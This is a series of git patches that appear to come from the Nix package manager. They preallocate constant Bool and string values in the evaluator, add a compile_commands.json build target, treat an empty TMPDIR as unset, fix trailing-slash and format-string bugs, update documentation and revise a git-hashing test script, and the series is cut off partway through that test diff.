 3 files changed, 22 insertions(+), 12 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index fb4cfdccf..a6e8a4a8b 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -437,6 +437,10 @@ EvalState::EvalState(
 
     vEmptyList.mkList(buildList(0));
     vNull.mkNull();
+    vStringRegular.mkString("regular");
+    vStringDirectory.mkString("directory");
+    vStringSymlink.mkString("symlink");
+    vStringUnknown.mkString("unknown");
 
     /* Initialise the Nix expression search path. */
     if (!evalSettings.pureEval) {
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 7db911fce..a405888c1 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -191,6 +191,15 @@ public:
      */
     Value vNull;
 
+    /** `"regular"` */
+    Value vStringRegular;
+    /** `"directory"` */
+    Value vStringDirectory;
+    /** `"symlink"` */
+    Value vStringSymlink;
+    /** `"unknown"` */
+    Value vStringUnknown;
+
     /**
      * The accessor for the root filesystem.
      */
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 61a11b226..2022f6dcf 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -1775,20 +1775,20 @@ static RegisterPrimOp primop_hashFile({
     .fun = prim_hashFile,
 });
 
-static std::string_view fileTypeToString(InputAccessor::Type type)
+static Value * fileTypeToString(EvalState & state, InputAccessor::Type type)
 {
     return
-        type == InputAccessor::Type::tRegular ? "regular" :
-        type == InputAccessor::Type::tDirectory ? "directory" :
-        type == InputAccessor::Type::tSymlink ? "symlink" :
-        "unknown";
+        type == InputAccessor::Type::tRegular ? &state.vStringRegular :
+        type == InputAccessor::Type::tDirectory ? &state.vStringDirectory :
+        type == InputAccessor::Type::tSymlink ? &state.vStringSymlink :
+        &state.vStringUnknown;
 }
 
 static void prim_readFileType(EvalState & state, const PosIdx pos, Value * * args, Value & v)
 {
     auto path = realisePath(state, pos, *args[0], std::nullopt);
     /* Retrieve the directory entry type and stringize it. */
-    v.mkString(fileTypeToString(path.lstat().type));
+    v = *fileTypeToString(state, path.lstat().type);
 }
 
 static RegisterPrimOp primop_readFileType({
@@ -1819,8 +1819,8 @@ static void prim_readDir(EvalState & state, const PosIdx pos, Value * * args, Va
     Value * readFileType = nullptr;
 
     for (auto & [name, type] : entries) {
-        auto & attr = attrs.alloc(name);
         if (!type) {
+            auto & attr = attrs.alloc(name);
             // Some filesystems or operating systems may not be able to return
             // detailed node info quickly in this case we produce a thunk to
             // query the file type lazily.
@@ -1832,7 +1832,7 @@ static void prim_readDir(EvalState & state, const PosIdx pos, Value * * args, Va
         } else {
             // This branch of the conditional is much more likely.
             // Here we just stringize the directory entry type.
-            attr.mkString(fileTypeToString(*type));
+            attrs.insert(state.symbols.create(name), fileTypeToString(state, *type));
         }
     }
 
@@ -2193,11 +2193,8 @@ bool EvalState::callPathFilter(
     Value arg1;
     arg1.mkString(pathArg);
 
-    Value arg2;
     // assert that type is not "unknown"
-    arg2.mkString(fileTypeToString(st.type));
-
-    Value * args []{&arg1, &arg2};
+    Value * args []{&arg1, fileTypeToString(*this, st.type)};
     Value res;
     callFunction(*filterFun, 2, args, res, pos);
 

From a865049c4f39cb7773f97a67cfa12f5b650a86ee Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 23:06:23 +0100
Subject: [PATCH 639/654] tryEval: Allocate true and false once

---
 src/libexpr/eval.cc    |  2 ++
 src/libexpr/eval.hh    | 18 +++++++++++++++++-
 src/libexpr/primops.cc |  7 ++++---
 3 files changed, 23 insertions(+), 4 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index a6e8a4a8b..a62cee299 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -437,6 +437,8 @@ EvalState::EvalState(
 
     vEmptyList.mkList(buildList(0));
     vNull.mkNull();
+    vTrue.mkBool(true);
+    vFalse.mkBool(false);
     vStringRegular.mkString("regular");
     vStringDirectory.mkString("directory");
     vStringSymlink.mkString("symlink");
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index a405888c1..eac83fe34 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -187,10 +187,26 @@ public:
     Value vEmptyList;
 
     /**
-     * Null constant.
+     * `null` constant.
+     *
+     * This is _not_ a singleton. Pointer equality is _not_ sufficient.
      */
     Value vNull;
 
+    /**
+     * `true` constant.
+     *
+     * This is _not_ a singleton. Pointer equality is _not_ sufficient.
+     */
+    Value vTrue;
+
+    /**
+     * `true` constant.
+     *
+     * This is _not_ a singleton. Pointer equality is _not_ sufficient.
+     */
+    Value vFalse;
+
     /** `"regular"` */
     Value vStringRegular;
     /** `"directory"` */
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 2022f6dcf..0f2aaa83f 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -896,10 +896,11 @@ static void prim_tryEval(EvalState & state, const PosIdx pos, Value * * args, Va
     try {
         state.forceValue(*args[0], pos);
         attrs.insert(state.sValue, args[0]);
-        attrs.alloc("success").mkBool(true);
+        attrs.insert(state.symbols.create("success"), &state.vTrue);
     } catch (AssertionError & e) {
-        attrs.alloc(state.sValue).mkBool(false);
-        attrs.alloc("success").mkBool(false);
+        // `value = false;` is unfortunate but removing it is a breaking change.
+        attrs.insert(state.sValue, &state.vFalse);
+        attrs.insert(state.symbols.create("success"), &state.vFalse);
     }
 
     // restore the debugRepl pointer if we saved it earlier.

From 8c6e0df45f9091fc27143f24d4fe782c661393e2 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 23:07:00 +0100
Subject: [PATCH 640/654] value.hh: Fix warning about {struct/class} Value

---
 src/libexpr/value.hh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh
index 885621cf5..335801b34 100644
--- a/src/libexpr/value.hh
+++ b/src/libexpr/value.hh
@@ -159,7 +159,7 @@ public:
     iterator begin() { return &elems[0]; }
     iterator end() { return &elems[size]; }
 
-    friend class Value;
+    friend struct Value;
 };
 
 

From 1fcdd1640ec2e63f14487c1af60514fb62ffef19 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 23:11:54 +0100
Subject: [PATCH 641/654] functionArgs: Allocate bools only once

---
 src/libexpr/eval.cc    | 3 +++
 src/libexpr/eval.hh    | 5 +++++
 src/libexpr/primops.cc | 3 +--
 3 files changed, 9 insertions(+), 2 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index a62cee299..5e2f71649 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -937,6 +937,9 @@ ListBuilder::ListBuilder(EvalState & state, size_t size)
     state.nrListElems += size;
 }
 
+Value * EvalState::getBool(bool b) {
+    return b ? &vTrue : &vFalse;
+}
 
 unsigned long nrThunks = 0;
 
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index eac83fe34..f15d19653 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -650,6 +650,11 @@ public:
         return ListBuilder(*this, size);
     }
 
+    /**
+     * Return a boolean `Value *` without allocating.
+     */
+    Value *getBool(bool b);
+
     void mkThunk_(Value & v, Expr * expr);
     void mkPos(Value & v, PosIdx pos);
 
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 0f2aaa83f..d0fcfd194 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -2845,8 +2845,7 @@ static void prim_functionArgs(EvalState & state, const PosIdx pos, Value * * arg
 
     auto attrs = state.buildBindings(args[0]->lambda.fun->formals->formals.size());
     for (auto & i : args[0]->lambda.fun->formals->formals)
-        // !!! should optimise booleans (allocate only once)
-        attrs.alloc(i.name, i.pos).mkBool(i.def);
+        attrs.insert(i.name, state.getBool(i.def), i.pos);
     v.mkAttrs(attrs);
 }
 

From 83fc988bec374d6beb197e6dde9aef20b6f52b8d Mon Sep 17 00:00:00 2001
From: Andrea Bedini 
Date: Mon, 18 Mar 2024 23:57:15 +0800
Subject: [PATCH 642/654] Create compile-commands.json with Make

---
 .gitignore                 |  1 +
 mk/compilation-database.mk | 11 +++++++++++
 mk/lib.mk                  |  8 ++++++++
 mk/patterns.mk             | 36 +++++++++++++++++++++++++++++++++---
 mk/tracing.mk              |  2 ++
 5 files changed, 55 insertions(+), 3 deletions(-)
 create mode 100644 mk/compilation-database.mk

diff --git a/.gitignore b/.gitignore
index 7bf77adf4..01fafa5a9 100644
--- a/.gitignore
+++ b/.gitignore
@@ -142,6 +142,7 @@ GTAGS
 
 # auto-generated compilation database
 compile_commands.json
+*.compile_commands.json
 
 nix-rust/target
 
diff --git a/mk/compilation-database.mk b/mk/compilation-database.mk
new file mode 100644
index 000000000..f69dc0de0
--- /dev/null
+++ b/mk/compilation-database.mk
@@ -0,0 +1,11 @@
+compile-commands-json-files :=
+
+define write-compile-commands
+  _srcs := $$(sort $$(foreach src, $$($(1)_SOURCES), $$(src)))
+
+  $(1)_COMPILE_COMMANDS_JSON := $$(addprefix $(buildprefix), $$(addsuffix .compile_commands.json, $$(basename $$(_srcs))))
+
+  compile-commands-json-files += $$($(1)_COMPILE_COMMANDS_JSON)
+
+  clean-files += $$($(1)_COMPILE_COMMANDS_JSON)
+endef
diff --git a/mk/lib.mk b/mk/lib.mk
index fe0add1c9..a002d823f 100644
--- a/mk/lib.mk
+++ b/mk/lib.mk
@@ -68,6 +68,7 @@ include mk/patterns.mk
 include mk/templates.mk
 include mk/cxx-big-literal.mk
 include mk/tests.mk
+include mk/compilation-database.mk
 
 
 # Include all sub-Makefiles.
@@ -97,6 +98,13 @@ $(foreach test-group, $(install-tests-groups), \
     $(eval $(call run-test,$(test),$(install_test_init))) \
     $(eval $(test-group).test-group: $(test).test)))
 
+# Compilation database.
+$(foreach lib, $(libraries), $(eval $(call write-compile-commands,$(lib))))
+$(foreach prog, $(programs), $(eval $(call write-compile-commands,$(prog))))
+
+compile_commands.json: $(compile-commands-json-files)
+	@jq --slurp '.' $^ >$@
+
 # Include makefiles requiring built programs.
 $(foreach mf, $(makefiles-late), $(eval $(call include-sub-makefile,$(mf))))
 
diff --git a/mk/patterns.mk b/mk/patterns.mk
index c81150260..4caa2039e 100644
--- a/mk/patterns.mk
+++ b/mk/patterns.mk
@@ -1,11 +1,41 @@
+
+# These are the complete command lines we use to compile C and C++ files.
+# - $< is the source file.
+# - $1 is the object file to create.
+CC_CMD=$(CC) -o $1 -c $< $(CPPFLAGS) $(GLOBAL_CFLAGS) $(CFLAGS) $($1_CFLAGS) -MMD -MF $(call filename-to-dep,$1) -MP
+CXX_CMD=$(CXX) -o $1 -c $< $(CPPFLAGS) $(GLOBAL_CXXFLAGS_PCH) $(GLOBAL_CXXFLAGS) $(CXXFLAGS) $($1_CXXFLAGS) $(ERROR_SWITCH_ENUM) -MMD -MF $(call filename-to-dep,$1) -MP
+
+# We use COMPILE_COMMANDS_JSON_CMD to turn a compilation command (like CC_CMD
+# or CXX_CMD above) into a comple_commands.json file. We rely on bash native
+# word splitting to define the positional arguments.
+# - $< is the source file being compiled.
+COMPILE_COMMANDS_JSON_CMD=jq --null-input '{ directory: $$ENV.PWD, file: "$<", arguments: $$ARGS.positional }' --args --
+
+
 $(buildprefix)%.o: %.cc
 	@mkdir -p "$(dir $@)"
-	$(trace-cxx) $(CXX) -o $@ -c $< $(CPPFLAGS) $(GLOBAL_CXXFLAGS_PCH) $(GLOBAL_CXXFLAGS) $(CXXFLAGS) $($@_CXXFLAGS) $(ERROR_SWITCH_ENUM) -MMD -MF $(call filename-to-dep, $@) -MP
+	$(trace-cxx) $(call CXX_CMD,$@)
 
 $(buildprefix)%.o: %.cpp
 	@mkdir -p "$(dir $@)"
-	$(trace-cxx) $(CXX) -o $@ -c $< $(CPPFLAGS) $(GLOBAL_CXXFLAGS_PCH) $(GLOBAL_CXXFLAGS) $(CXXFLAGS) $($@_CXXFLAGS) $(ERROR_SWITCH_ENUM) -MMD -MF $(call filename-to-dep, $@) -MP
+	$(trace-cxx) $(call CXX_CMD,$@)
 
 $(buildprefix)%.o: %.c
 	@mkdir -p "$(dir $@)"
-	$(trace-cc) $(CC) -o $@ -c $< $(CPPFLAGS) $(GLOBAL_CFLAGS) $(CFLAGS) $($@_CFLAGS) -MMD -MF $(call filename-to-dep, $@) -MP
+	$(trace-cc) $(call CC_CMD,$@)
+
+# In the following we need to replace the .compile_commands.json extension in $@ with .o
+# to make the object file. This is needed because CC_CMD and CXX_CMD do further expansions
+# based on the object file name (i.e. *_CXXFLAGS and filename-to-dep).
+
+$(buildprefix)%.compile_commands.json: %.cc
+	@mkdir -p "$(dir $@)"
+	$(trace-jq) $(COMPILE_COMMANDS_JSON_CMD) $(call CXX_CMD,$(@:.compile_commands.json=.o)) > $@
+
+$(buildprefix)%.compile_commands.json: %.cpp
+	@mkdir -p "$(dir $@)"
+	$(trace-jq) $(COMPILE_COMMANDS_JSON_CMD) $(call CXX_CMD,$(@:.compile_commands.json=.o)) > $@
+
+$(buildprefix)%.compile_commands.json: %.c
+	@mkdir -p "$(dir $@)"
+	$(trace-jq) $(COMPILE_COMMANDS_JSON_CMD) $(call CC_CMD,$(@:.compile_commands.json=.o)) > $@
diff --git a/mk/tracing.mk b/mk/tracing.mk
index 1fc5573d7..09db1e617 100644
--- a/mk/tracing.mk
+++ b/mk/tracing.mk
@@ -10,6 +10,8 @@ ifeq ($(V), 0)
   trace-install = @echo "  INST  " $@;
   trace-mkdir   = @echo "  MKDIR " $@;
   trace-test    = @echo "  TEST  " $@;
+  trace-sh      = @echo "  SH    " $@;
+  trace-jq      = @echo "  JQ    " $@;
 
   suppress  = @
 

From d0824f661e712c384332953db54bb523834909ce Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Thu, 21 Mar 2024 16:54:28 +0100
Subject: [PATCH 643/654] Document the new `compile_commands.json` target

---
 doc/manual/src/contributing/hacking.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md
index 916ec3077..28ed49666 100644
--- a/doc/manual/src/contributing/hacking.md
+++ b/doc/manual/src/contributing/hacking.md
@@ -258,7 +258,7 @@ See [supported compilation environments](#compilation-environments) and instruct
 To use the LSP with your editor, you first need to [set up `clangd`](https://clangd.llvm.org/installation#project-setup) by running:
 
 ```console
-make clean && bear -- make -j$NIX_BUILD_CORES default check install
+make compile_commands.json
 ```
 
 Configure your editor to use the `clangd` from the shell, either by running it inside the development shell, or by using [nix-direnv](https://github.com/nix-community/nix-direnv) and [the appropriate editor plugin](https://github.com/direnv/direnv/wiki#editor-integration).

From 4e2f11b6927cb0e4171b2758196f2310760617d2 Mon Sep 17 00:00:00 2001
From: Tharun T 
Date: Fri, 22 Mar 2024 18:34:55 +0530
Subject: [PATCH 644/654] doc build output correction

Signed-off-by: Tharun T 
---
 doc/manual/src/contributing/documentation.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/contributing/documentation.md b/doc/manual/src/contributing/documentation.md
index 1dddb207c..46cca759d 100644
--- a/doc/manual/src/contributing/documentation.md
+++ b/doc/manual/src/contributing/documentation.md
@@ -30,7 +30,7 @@ To build the manual incrementally, [enter the development shell](./hacking.md) a
 make manual-html -j $NIX_BUILD_CORES
 ```
 
-and open `./outputs/out/share/doc/nix/manual/language/index.html`.
+and open `./outputs/doc/share/doc/nix/manual/language/index.html`.
 
 In order to reflect changes to the [Makefile for the manual], clear all generated files before re-building:
 

From bfd36402acc976c32ec8349a2a25fa4288d65475 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 22 Mar 2024 18:11:24 +0100
Subject: [PATCH 645/654] EvalCache: Fix missing format string argument

Fixes

  terminate called after throwing an instance of 'boost::wrapexcept'
    what():  boost::too_few_args: format-string referred to more arguments than were passed
  Aborted (core dumped)

for type errors in AttrCursor.
---
 src/libexpr/eval-cache.cc | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/libexpr/eval-cache.cc b/src/libexpr/eval-cache.cc
index 2fc69e796..1538eb056 100644
--- a/src/libexpr/eval-cache.cc
+++ b/src/libexpr/eval-cache.cc
@@ -581,7 +581,7 @@ std::string AttrCursor::getString()
     auto & v = forceValue();
 
     if (v.type() != nString && v.type() != nPath)
-        root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow();
+        root->state.error("'%s' is not a string but %s", getAttrPathStr(), showType(v)).debugThrow();
 
     return v.type() == nString ? v.c_str() : v.path().to_string();
 }
@@ -630,7 +630,7 @@ string_t AttrCursor::getStringWithContext()
     else if (v.type() == nPath)
         return {v.path().to_string(), {}};
     else
-        root->state.error("'%s' is not a string but %s", getAttrPathStr()).debugThrow();
+        root->state.error("'%s' is not a string but %s", getAttrPathStr(), showType(v)).debugThrow();
 }
 
 bool AttrCursor::getBool()

From cc29d85d06dbb050ac7df0f532ec0bec6212232b Mon Sep 17 00:00:00 2001
From: Picnoir 
Date: Fri, 22 Mar 2024 22:31:41 +0100
Subject: [PATCH 646/654] Doc: explicitly specify which shell to use to get
 clangd

I was using by mistake the .#nix-clangStdenv shell to retrieve clangd.
This clangd is unusable with the project and constantly segfaults.
Let's explicitly state which shell the user should use in the docs.

I don't really understand the source of this segfault. I assume it's
related to a clang version incompatibility. (16.0.6 for
.#nix-clangStdenv 14.0.6 for .#native-clangStdenvPackages)
---
 doc/manual/src/contributing/hacking.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md
index 28ed49666..2ff70f500 100644
--- a/doc/manual/src/contributing/hacking.md
+++ b/doc/manual/src/contributing/hacking.md
@@ -261,7 +261,7 @@ To use the LSP with your editor, you first need to [set up `clangd`](https://cla
 make compile_commands.json
 ```
 
-Configure your editor to use the `clangd` from the shell, either by running it inside the development shell, or by using [nix-direnv](https://github.com/nix-community/nix-direnv) and [the appropriate editor plugin](https://github.com/direnv/direnv/wiki#editor-integration).
+Configure your editor to use the `clangd` from the `.#native-clangStdenvPackages` shell. You can do that either by running it inside the development shell, or by using [nix-direnv](https://github.com/nix-community/nix-direnv) and [the appropriate editor plugin](https://github.com/direnv/direnv/wiki#editor-integration).
 
 > **Note**
 >

From c3fb2aa1f9d1fa756dac38d3588c836c5a5395dc Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Fri, 22 Mar 2024 22:41:50 +0100
Subject: [PATCH 647/654] fix: Treat empty TMPDIR as unset

Fixes an instance of

    nix: src/libutil/util.cc:139: nix::Path nix::canonPath(PathView, bool): Assertion `path != ""' failed.

... which I've been getting in one of my shells for some reason.
I have yet to find out why TMPDIR was empty, but it's no reason for
Nix to break.
---
 src/libstore/globals.cc    | 2 +-
 src/libutil/file-system.cc | 8 ++++++--
 src/libutil/file-system.hh | 4 ++++
 src/nix-build/nix-build.cc | 2 +-
 4 files changed, 12 insertions(+), 4 deletions(-)

diff --git a/src/libstore/globals.cc b/src/libstore/globals.cc
index d22ae4ca0..fa0938d7b 100644
--- a/src/libstore/globals.cc
+++ b/src/libstore/globals.cc
@@ -415,7 +415,7 @@ void initLibStore() {
        sshd). This breaks build users because they don't have access
        to the TMPDIR, in particular in ‘nix-store --serve’. */
 #if __APPLE__
-    if (hasPrefix(getEnv("TMPDIR").value_or("/tmp"), "/var/folders/"))
+    if (hasPrefix(defaultTempDir(), "/var/folders/"))
         unsetenv("TMPDIR");
 #endif
 
diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc
index 9dd6a5133..9f81ee452 100644
--- a/src/libutil/file-system.cc
+++ b/src/libutil/file-system.cc
@@ -494,10 +494,14 @@ void AutoDelete::reset(const Path & p, bool recursive) {
 
 //////////////////////////////////////////////////////////////////////
 
+std::string defaultTempDir() {
+    return getEnvNonEmpty("TMPDIR").value_or("/tmp");
+}
+
 static Path tempName(Path tmpRoot, const Path & prefix, bool includePid,
     std::atomic & counter)
 {
-    tmpRoot = canonPath(tmpRoot.empty() ? getEnv("TMPDIR").value_or("/tmp") : tmpRoot, true);
+    tmpRoot = canonPath(tmpRoot.empty() ? defaultTempDir() : tmpRoot, true);
     if (includePid)
         return fmt("%1%/%2%-%3%-%4%", tmpRoot, prefix, getpid(), counter++);
     else
@@ -537,7 +541,7 @@ Path createTempDir(const Path & tmpRoot, const Path & prefix,
 
 std::pair createTempFile(const Path & prefix)
 {
-    Path tmpl(getEnv("TMPDIR").value_or("/tmp") + "/" + prefix + ".XXXXXX");
+    Path tmpl(defaultTempDir() + "/" + prefix + ".XXXXXX");
     // Strictly speaking, this is UB, but who cares...
     // FIXME: use O_TMPFILE.
     AutoCloseFD fd(mkstemp((char *) tmpl.c_str()));
diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh
index 963265e34..9d565c881 100644
--- a/src/libutil/file-system.hh
+++ b/src/libutil/file-system.hh
@@ -234,6 +234,10 @@ Path createTempDir(const Path & tmpRoot = "", const Path & prefix = "nix",
  */
 std::pair createTempFile(const Path & prefix = "nix");
 
+/**
+ * Return `TMPDIR`, or the default temporary directory if unset or empty.
+ */
+Path defaultTempDir();
 
 /**
  * Used in various places.
diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc
index a372e4b1c..418ee0ddd 100644
--- a/src/nix-build/nix-build.cc
+++ b/src/nix-build/nix-build.cc
@@ -476,7 +476,7 @@ static void main_nix_build(int argc, char * * argv)
         auto env = getEnv();
 
         auto tmp = getEnv("TMPDIR");
-        if (!tmp) tmp = getEnv("XDG_RUNTIME_DIR").value_or("/tmp");
+        if (!tmp || tmp->empty()) tmp = getEnv("XDG_RUNTIME_DIR").value_or("/tmp");
 
         if (pure) {
             decltype(env) newEnv;

From b9e7f5aa2df3f0e223f5c44b8089cbf9b81be691 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 00:34:21 +0100
Subject: [PATCH 648/654] fix: Treat empty XDG_RUNTIME_DIR as unset

See preceding commit. Not observed in the wild, but is sensible
and consistent with TMPDIR behavior.
---
 src/nix-build/nix-build.cc | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/src/nix-build/nix-build.cc b/src/nix-build/nix-build.cc
index 418ee0ddd..35eef5b83 100644
--- a/src/nix-build/nix-build.cc
+++ b/src/nix-build/nix-build.cc
@@ -475,8 +475,9 @@ static void main_nix_build(int argc, char * * argv)
         // Set the environment.
         auto env = getEnv();
 
-        auto tmp = getEnv("TMPDIR");
-        if (!tmp || tmp->empty()) tmp = getEnv("XDG_RUNTIME_DIR").value_or("/tmp");
+        auto tmp = getEnvNonEmpty("TMPDIR");
+        if (!tmp)
+            tmp = getEnvNonEmpty("XDG_RUNTIME_DIR").value_or("/tmp");
 
         if (pure) {
             decltype(env) newEnv;

From fd31945742710984de22805ee8d97fbd83c3f8eb Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 00:45:15 +0100
Subject: [PATCH 649/654] local-derivation-goal.cc: Reuse defaultTempDir()

---
 src/libstore/build/local-derivation-goal.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index a9b6a8dbf..f65afdf07 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2090,7 +2090,7 @@ void LocalDerivationGoal::runChild()
 
             /* The tmpDir in scope points at the temporary build directory for our derivation. Some packages try different mechanisms
                to find temporary directories, so we want to open up a broader place for them to dump their files, if needed. */
-            Path globalTmpDir = canonPath(getEnvNonEmpty("TMPDIR").value_or("/tmp"), true);
+            Path globalTmpDir = canonPath(defaultTempDir(), true);
 
             /* They don't like trailing slashes on subpath directives */
             if (globalTmpDir.back() == '/') globalTmpDir.pop_back();

From dd26f413791b7885558afcc628623648b7fa6396 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 00:45:57 +0100
Subject: [PATCH 650/654] local-derivation-goal.cc: Remove *all* trailing
 slashes

---
 src/libstore/build/local-derivation-goal.cc | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc
index f65afdf07..612434e4d 100644
--- a/src/libstore/build/local-derivation-goal.cc
+++ b/src/libstore/build/local-derivation-goal.cc
@@ -2093,7 +2093,8 @@ void LocalDerivationGoal::runChild()
             Path globalTmpDir = canonPath(defaultTempDir(), true);
 
             /* They don't like trailing slashes on subpath directives */
-            if (globalTmpDir.back() == '/') globalTmpDir.pop_back();
+            while (!globalTmpDir.empty() && globalTmpDir.back() == '/')
+                globalTmpDir.pop_back();
 
             if (getEnv("_NIX_TEST_NO_SANDBOX") != "1") {
                 builder = "/usr/bin/sandbox-exec";

From 850c9a6cafb74a82b8111dd6aeb4c0d434aba414 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 00:46:15 +0100
Subject: [PATCH 651/654] HttpBinaryCacheStore: Remove *all* trailing slashes

---
 src/libstore/http-binary-cache-store.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/http-binary-cache-store.cc b/src/libstore/http-binary-cache-store.cc
index 85c5eed4c..5da87e935 100644
--- a/src/libstore/http-binary-cache-store.cc
+++ b/src/libstore/http-binary-cache-store.cc
@@ -49,7 +49,7 @@ public:
         , BinaryCacheStore(params)
         , cacheUri(scheme + "://" + _cacheUri)
     {
-        if (cacheUri.back() == '/')
+        while (!cacheUri.empty() && cacheUri.back() == '/')
             cacheUri.pop_back();
 
         diskCache = getNarInfoDiskCache();

From 3b7f2bf99751bb51a9e9c4dab0fe2db1a6ff07ca Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 00:54:44 +0100
Subject: [PATCH 652/654] git/dumpTree: Assert name not empty before back()

---
 src/libutil/git.cc | 1 +
 1 file changed, 1 insertion(+)

diff --git a/src/libutil/git.cc b/src/libutil/git.cc
index 0b6e35222..a60589baa 100644
--- a/src/libutil/git.cc
+++ b/src/libutil/git.cc
@@ -251,6 +251,7 @@ void dumpTree(const Tree & entries, Sink & sink,
     for (auto & [name, entry] : entries) {
         auto name2 = name;
         if (entry.mode == Mode::Directory) {
+            assert(!name2.empty());
             assert(name2.back() == '/');
             name2.pop_back();
         }

From fbf493758c0134a9b4c73b7dd38fc4c1d480b76c Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Sun, 24 Mar 2024 02:08:28 +0100
Subject: [PATCH 653/654] doc/language: Link to nix.dev introduction

Closes #10283
---
 doc/manual/src/language/index.md | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/doc/manual/src/language/index.md b/doc/manual/src/language/index.md
index 5388c6dc4..650412f1b 100644
--- a/doc/manual/src/language/index.md
+++ b/doc/manual/src/language/index.md
@@ -1,7 +1,13 @@
 # Nix Language
 
 The Nix language is designed for conveniently creating and composing *derivations* – precise descriptions of how contents of existing files are used to derive new files.
-It is:
+
+> **Tip**
+>
+> These pages are written as a reference.
+> If you are learning Nix, nix.dev has a good [introduction to the Nix language](https://nix.dev/tutorials/nix-language).
+
+The language is:
 
 - *domain-specific*
 

From 2a44b11f55939a97e3712a4525e60c4d4b12ea13 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Sat, 23 Mar 2024 22:01:30 -0400
Subject: [PATCH 654/654] Fix `git-hashing/simple.sh`

I realized it was checking NAR hashes before of added objects, which
makes little sense --- we don't really care about ancillary NAR hashes.

Now, the bottom `nix store add` tests compare the CA field with a git
hash to hashes calculated by Git. This matches top `nix hash path` ones
in using git as a source of truth.
---
 tests/functional/git-hashing/simple.sh | 74 +++++++++++++++-----------
 1 file changed, 42 insertions(+), 32 deletions(-)

diff --git a/tests/functional/git-hashing/simple.sh b/tests/functional/git-hashing/simple.sh
index 604e1a175..f43168eb2 100644
--- a/tests/functional/git-hashing/simple.sh
+++ b/tests/functional/git-hashing/simple.sh
@@ -6,8 +6,9 @@ git init "$repo"
 git -C "$repo" config user.email "you@example.com"
 git -C "$repo" config user.name "Your Name"
 
+# Compare Nix's and git's implementation of git hashing
 try () {
-    hash=$(nix hash path --mode git --format base16 --algo sha1 $TEST_ROOT/hash-path)
+    local hash=$(nix hash path --mode git --format base16 --algo sha1 $TEST_ROOT/hash-path)
     [[ "$hash" == "$1" ]]
 
     git -C "$repo" rm -rf hash-path || true
@@ -15,7 +16,7 @@ try () {
     git -C "$repo" add hash-path
     git -C "$repo" commit -m "x"
     git -C "$repo" status
-    hash2=$(git -C "$TEST_ROOT/scratch" rev-parse HEAD:hash-path)
+    local hash2=$(git -C "$TEST_ROOT/scratch" rev-parse HEAD:hash-path)
     [[ "$hash2" = "$1" ]]
 }
 
@@ -32,36 +33,45 @@ echo "Run Hello World" > $TEST_ROOT/hash-path/executable
 chmod +x $TEST_ROOT/hash-path/executable
 try "e5c0a11a556801a5c9dcf330ca9d7e2c572697f4"
 
-rm -rf $TEST_ROOT/dummy1
-echo Hello World! > $TEST_ROOT/dummy1
-path1=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy1)
-hash1=$(nix-store -q --hash $path1)
